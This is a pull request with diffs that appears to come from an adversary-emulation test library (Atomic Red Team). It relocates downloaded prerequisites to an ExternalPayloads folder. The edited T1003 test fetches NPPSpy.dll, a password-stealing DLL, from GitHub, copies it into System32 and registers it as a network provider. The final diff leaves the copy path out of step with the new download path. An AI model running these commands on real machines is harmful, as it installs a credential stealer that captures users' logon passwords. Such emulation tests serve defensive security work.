### PR TITLE
Add ExternalPayloads folder for downloaded prerequisites

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -60,4 +60,4 @@ terraform.rc
 *.pyc
 
 # The ExternalPayloads folder
-atomics/ExternalPayloads/*
+ExternalPayloads

--- a/.gitignore
+++ b/.gitignore
@@ -58,3 +58,6 @@ override.tf.json
 terraform.rc
 
 *.pyc
+
+# The ExternalPayloads folder
+atomics/ExternalPayloads/*

--- a/atomics/ExternalPayloads/README.md
+++ b/atomics/ExternalPayloads/README.md
@@ -1,1 +1,0 @@
-The atomics\ExternalPayloads folder is a reserved location for atomics to download prerequisites into.

--- a/atomics/ExternalPayloads/README.md
+++ b/atomics/ExternalPayloads/README.md
@@ -1,0 +1,1 @@
+The atomics\ExternalPayloads folder is a reserved location for atomics to download prerequisites into.

--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -58,14 +58,14 @@ atomic_tests:
   - windows
   dependency_executor_name: powershell
   dependencies:
-  - description: NPPSpy.dll must be available in local temp directory
-    prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
+  - description: NPPSpy.dll must be available in ExternalPayloads directory
+    prereq_command: if (Test-Path "PathToAtomicsFolder\ExternalPayloads\NPPSPY.dll") {exit 0} else {exit 1}
     get_prereq_command: |-
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
+      Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\ExternalPayloads\NPPSPY.dll"
   executor:
     command: |-
-      Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
+      Copy-Item "PathToAtomicsFolder\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
       $path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
       $UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
       Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue

--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -59,10 +59,11 @@ atomic_tests:
   dependency_executor_name: powershell
   dependencies:
   - description: NPPSpy.dll must be available in ExternalPayloads directory
-    prereq_command: if (Test-Path "PathToAtomicsFolder\ExternalPayloads\NPPSPY.dll") {exit 0} else {exit 1}
+    prereq_command: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll") {exit 0} else {exit 1}
     get_prereq_command: |-
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\ExternalPayloads\NPPSPY.dll"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll"
   executor:
     command: |-
       Copy-Item "PathToAtomicsFolder\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"


### PR DESCRIPTION
This will address the issue described in issue #2350 

This updates only one atomic, however, after approval of this PR we will continue making the updates to the other atomic tests.